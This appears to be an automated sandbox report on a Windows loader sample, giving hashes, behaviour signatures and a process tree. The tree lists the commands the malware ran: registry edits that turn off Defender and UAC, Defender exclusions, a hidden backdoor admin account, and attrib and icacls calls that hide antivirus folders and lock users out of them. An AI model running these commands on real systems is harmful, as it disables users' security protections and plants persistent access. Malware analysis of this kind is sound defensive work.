Analysis

  • max time kernel
    103s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 15:00

General

  • Target

    2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe

  • Size

    201KB

  • MD5

    f513dc988cb2c77428b754ffb9669040

  • SHA1

    e8e5386c5e7e53f0ef1270e92c1b45c2df3bd71a

  • SHA256

    a36bb3dbfa3e5ecbbafc07e1f3829035101a2f5883667bf0cbe2e686857a9ccd

  • SHA512

    80cbb72d888744352db1fe73139aee3beefb3d98f06c91f90cbc87f3be6470f5b890f41d8a75910a50fec7969cf310802bfba05c99ec70b1090789a1f790e99a

  • SSDEEP

    3072:m5S0VvIH4lindUJXw58BkgnyNMIoVtmvVg4gdYbnybcapz/0Ic6o+Fc28V4EK:ma4InuJg58BkgqPoDH49n8Bb/c20Q

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Possible privilege escalation attempt 64 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 23 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-01_f513dc988cb2c77428b754ffb9669040_amadey_konni_smoke-loader.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3476
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\temp\Clean.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:6076
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\microsoft\Temp\Clean.bat" "
        3⤵
        • Enumerates connected drives
        • Suspicious use of WriteProcessMemory
        PID:3324
        • C:\Windows\SysWOW64\sc.exe
          sc delete swprv
          4⤵
          • Launches sc.exe
          PID:3848
        • C:\Windows\SysWOW64\sc.exe
          sc start AppIDSvc
          4⤵
          • Launches sc.exe
          PID:6060
        • C:\Windows\SysWOW64\sc.exe
          sc config AppIDSvc start= Auto
          4⤵
          • Launches sc.exe
          PID:5040
        • C:\Windows\SysWOW64\sc.exe
          sc start AppMgmt
          4⤵
          • Launches sc.exe
          PID:4452
        • C:\Windows\SysWOW64\sc.exe
          sc config AppMgmt start= Auto
          4⤵
          • Launches sc.exe
          PID:4352
        • C:\Windows\SysWOW64\taskkill.exe
          TASKKILL /IM mbamservice.EXE /T /F
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
        • C:\Windows\SysWOW64\sc.exe
          sc stop mbamservice
          4⤵
          • Launches sc.exe
          PID:2492
        • C:\Windows\SysWOW64\sc.exe
          sc delete mbamservice
          4⤵
          • Launches sc.exe
          PID:3300
        • C:\Windows\SysWOW64\sc.exe
          sc stop MinerGate
          4⤵
          • Launches sc.exe
          PID:5276
        • C:\Windows\SysWOW64\sc.exe
          sc delete MinerGate
          4⤵
          • Launches sc.exe
          PID:616
        • C:\Windows\SysWOW64\schtasks.exe
          SCHTASKS /Delete /TN "System\SecurityService" /F
          4⤵
            PID:1048
          • C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /Delete /TN "Windows\ServiceRun" /F
            4⤵
              PID:736
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /Delete /TN "System\SecurityService" /F
              4⤵
                PID:4764
              • C:\Windows\SysWOW64\schtasks.exe
                SCHTASKS /Delete /TN "System\SecurityService2" /F
                4⤵
                  PID:2544
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /Delete /TN "System\Security Service2" /F
                  4⤵
                    PID:2036
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /Delete /TN "Windowss\Data\ServiceRun" /F
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:5412
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /Delete /TN "Windowss\Data\ServiceRun0" /F
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:808
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /Delete /TN "Windowss\Data\ServiceRun1" /F
                    4⤵
                      PID:4128
                    • C:\Windows\SysWOW64\schtasks.exe
                      SCHTASKS /Delete /TN "Windowss\Data\ServiceRun2" /F
                      4⤵
                        PID:888
                      • C:\Windows\SysWOW64\schtasks.exe
                        SCHTASKS /Delete /TN "Windowss\Data\ServiceRun3" /F
                        4⤵
                          PID:744
                        • C:\Windows\SysWOW64\schtasks.exe
                          SCHTASKS /Delete /TN "AzureSDKService" /F
                          4⤵
                            PID:4260
                          • C:\Windows\SysWOW64\schtasks.exe
                            SCHTASKS /Delete /TN "WindowsUpdater" /F
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2576
                          • C:\Windows\SysWOW64\schtasks.exe
                            SCHTASKS /Delete /TN "AdobeUppdate" /F
                            4⤵
                              PID:4532
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Windows\SpaceManagTask" /F
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:224
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "System\SecurityService" /F
                              4⤵
                                PID:5968
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Windows\ServiceRun" /F
                                4⤵
                                  PID:2756
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "\Microsoft\Windows\WindowsUpdate\SUpdate" /F
                                  4⤵
                                    PID:5060
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "\Windows\CampaignManager" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2660
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "\Windows\FamilySafetyRefresherTask" /F
                                    4⤵
                                      PID:3316
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "\Windows\ServiceRun" /F
                                      4⤵
                                        PID:4664
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "\Windows\SpaceManagTask" /F
                                        4⤵
                                          PID:4236
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v UseActionCenterExperience /t REG_DWORD /d 0 /f
                                          4⤵
                                            PID:4080
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
                                            4⤵
                                              PID:1420
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting" /v disable /t REG_DWORD /d 1 /f
                                              4⤵
                                                PID:3500
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
                                                4⤵
                                                  PID:5596
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
                                                  4⤵
                                                    PID:1216
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
                                                    4⤵
                                                      PID:2260
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                                                      4⤵
                                                        PID:5352
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                        4⤵
                                                        • UAC bypass
                                                        PID:4060
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
                                                        4⤵
                                                        • Hide Artifacts: Hidden Users
                                                        PID:3240
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Programdata /t REG_SZ /d System /f
                                                        4⤵
                                                          PID:4580
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ProgramData /t REG_DWORD /d 0 /f
                                                          4⤵
                                                          • Windows security bypass
                                                          PID:5084
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v Exclusions_Paths /t REG_DWORD /d 1 /f
                                                          4⤵
                                                            PID:5336
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                            4⤵
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            PID:5780
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net user John 12345 /add
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3656
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 user John 12345 /add
                                                              5⤵
                                                                PID:1728
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" john /add
                                                              4⤵
                                                                PID:1460
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" john /add
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5972
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add
                                                                4⤵
                                                                  PID:1772
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add
                                                                    5⤵
                                                                      PID:5644
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3756
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add
                                                                      5⤵
                                                                        PID:4972
                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                      ATTRIB +H +S "C:\Program Files\COMODO\COMODO Internet Security"
                                                                      4⤵
                                                                      • Drops file in Program Files directory
                                                                      • Views/modifies file attributes
                                                                      PID:5288
                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                      icacls "C:\Program Files\COMODO\COMODO Internet Security" /deny Admin:(OI)(CI)(F)
                                                                      4⤵
                                                                        PID:2456
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        ATTRIB +H +S "C:\Program Files (x86)\360\Total Security"
                                                                        4⤵
                                                                        • Drops file in Program Files directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Views/modifies file attributes
                                                                        PID:3208
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls "C:\Program Files (x86)\360\Total Security" /deny Admin:(OI)(CI)(F)
                                                                        4⤵
                                                                        • Modifies file permissions
                                                                        PID:1748
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        ATTRIB +H +S C:\ProgramData\360TotalSecurity
                                                                        4⤵
                                                                          PID:3212
                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                          ATTRIB +H +S C:\ProgramData\360safe
                                                                          4⤵
                                                                          • Views/modifies file attributes
                                                                          PID:2800
                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                          icacls "C:\ProgramData\360TotalSecurity" /deny Admin:(OI)(CI)(F)
                                                                          4⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:1760
                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                          icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                          4⤵
                                                                            PID:2644
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            TASKKILL /IM SPYHUNTER4.EXE /T /F
                                                                            4⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2132
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 1
                                                                            4⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:436
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            ATTRIB +H +S C:\Program Files\Enigma Software Group\SpyHunter
                                                                            4⤵
                                                                              PID:3376
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls "C:\Program Files\Enigma Software Group\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                              4⤵
                                                                              • Possible privilege escalation attempt
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4948
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls "C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe" /deny Admin:(D,F)
                                                                              4⤵
                                                                              • Modifies file permissions
                                                                              PID:5384
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              ATTRIB +H +S C:\Program Files (x86)\SpyHunter
                                                                              4⤵
                                                                              • Views/modifies file attributes
                                                                              PID:2360
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              ATTRIB +H +S C:\Program Files\SpyHunter
                                                                              4⤵
                                                                              • Views/modifies file attributes
                                                                              PID:4660
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                              4⤵
                                                                                PID:4088
                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                4⤵
                                                                                  PID:1056
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls "C:\Program Files\SpyHunter\SpyHunter4.exe" /deny Admin:(D,F)
                                                                                  4⤵
                                                                                  • Modifies file permissions
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3080
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls "C:\Program Files (x86)\SpyHunter\SpyHunter4.exe" /deny ┬±σ:(D,F)
                                                                                  4⤵
                                                                                    PID:1080
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    TASKKILL /IM Cube.exe /T /F
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3608
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    ATTRIB +H +S "C:\Program Files (x86)\Cezurity"
                                                                                    4⤵
                                                                                    • Drops file in Program Files directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Views/modifies file attributes
                                                                                    PID:3156
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    ATTRIB +H +S "C:\Program Files\Cezurity"
                                                                                    4⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:1172
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    ATTRIB +H +S C:\ProgramData\Cezurity
                                                                                    4⤵
                                                                                      PID:4028
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\ProgramData\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                      4⤵
                                                                                        PID:4488
                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                        4⤵
                                                                                        • Modifies file permissions
                                                                                        PID:3760
                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                        4⤵
                                                                                          PID:3744
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          ATTRIB +H +S "C:\ProgramData\McAfee"
                                                                                          4⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:832
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                          4⤵
                                                                                          • Modifies file permissions
                                                                                          PID:5428
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          ATTRIB +H +S "C:\Program Files\McAfee"
                                                                                          4⤵
                                                                                          • Drops file in Program Files directory
                                                                                          • Views/modifies file attributes
                                                                                          PID:3720
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                          4⤵
                                                                                          • Modifies file permissions
                                                                                          PID:1688
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          ATTRIB +H +S "C:\Program Files\McAfee.com"
                                                                                          4⤵
                                                                                          • Drops file in Program Files directory
                                                                                          • Views/modifies file attributes
                                                                                          PID:3644
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files\McAfee.com" /deny Admin:(OI)(CI)(F)
                                                                                          4⤵
                                                                                          • Modifies file permissions
                                                                                          PID:5940
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          ATTRIB +H +S C:\ProgramData\Avira
                                                                                          4⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:1212
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                          4⤵
                                                                                            PID:3228
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            ATTRIB +H +S "C:\ProgramData\Package Cache"
                                                                                            4⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:1764
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
                                                                                            4⤵
                                                                                            • Possible privilege escalation attempt
                                                                                            • Modifies file permissions
                                                                                            PID:5916
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            ATTRIB +H +S "C:\Program Files\ESET"
                                                                                            4⤵
                                                                                            • Drops file in Program Files directory
                                                                                            PID:5944
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                            4⤵
                                                                                            • Possible privilege escalation attempt
                                                                                            PID:4284
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            ATTRIB +H +S C:\ProgramData\ESET
                                                                                            4⤵
                                                                                              PID:440
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                              4⤵
                                                                                              • Modifies file permissions
                                                                                              PID:4076
                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                              ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
                                                                                              4⤵
                                                                                              • Drops file in Program Files directory
                                                                                              • Views/modifies file attributes
                                                                                              PID:6040
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Program Files\AVAST Software\Avast" /deny Admin:(OI)(CI)(F)
                                                                                              4⤵
                                                                                              • Modifies file permissions
                                                                                              PID:4176
                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                              ATTRIB +H +S "C:\Programdata\AVAST Software"
                                                                                              4⤵
                                                                                                PID:3296
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                4⤵
                                                                                                • Possible privilege escalation attempt
                                                                                                • Modifies file permissions
                                                                                                PID:1672
                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
                                                                                                4⤵
                                                                                                  PID:5064
                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                  ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
                                                                                                  4⤵
                                                                                                    PID:6140
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                    4⤵
                                                                                                      PID:1808
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:2264
                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                      ATTRIB +H +S "C:\Program Files\Kaspersky Lab"
                                                                                                      4⤵
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:2000
                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                      ATTRIB +H +S "C:\Program Files (x86)\Kaspersky Lab"
                                                                                                      4⤵
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:1332
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                        PID:1888
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                        • Possible privilege escalation attempt
                                                                                                        PID:2868
                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                        ATTRIB +H +S "C:\AdwCleaner"
                                                                                                        4⤵
                                                                                                          PID:3728
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\AdwCleaner" /deny Admin:(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:4544
                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
                                                                                                            4⤵
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Views/modifies file attributes
                                                                                                            PID:4536
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny Admin:(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                            • Possible privilege escalation attempt
                                                                                                            PID:3196
                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                            ATTRIB +H +S "C:\ProgramData\Norton"
                                                                                                            4⤵
                                                                                                              PID:1976
                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                              icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:2652
                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                ATTRIB +H +S "C:\ProgramData\Avg"
                                                                                                                4⤵
                                                                                                                  PID:5076
                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                  icacls "C:\ProgramData\Avg" /deny Admin:(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2408
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  ATTRIB +H +S "C:\Program Files\AVG"
                                                                                                                  4⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:4440
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  ATTRIB +H +S "C:\Program Files (x86)\AVG"
                                                                                                                  4⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:4424
                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                  icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                    PID:2292
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    PID:5680
                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                    ATTRIB +H +S "C:\ProgramData\grizzly"
                                                                                                                    4⤵
                                                                                                                      PID:4980
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1368
                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                      ATTRIB +H +S "C:\Users\Admin\AppData\Local\Temp\grizzly-setup-cache"
                                                                                                                      4⤵
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:5444
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\Users\Admin\AppData\Local\Temp\grizzly-setup-cache" /deny Admin:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      PID:5440
                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                      ATTRIB +H +S "C:\ProgramData\Doctor Web"
                                                                                                                      4⤵
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:5788
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      PID:368
                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                      ATTRIB +H +S "C:\users\Admin\appdata\roaming\microsoft\windows\helper.exe"
                                                                                                                      4⤵
                                                                                                                        PID:4672
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        ATTRIB +H +S "C:\programdata\olly.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:1652
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        ATTRIB +H +S "C:\programdata\iostream.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5636
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        ATTRIB +H +S "C:\programdata\SystemIdle.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2228
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        ATTRIB +H +S "C:\programdata\System Idle.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5792
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        ATTRIB +H +S "C:\users\Admin\AppData\Roaming\winhost.exe"
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2692
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
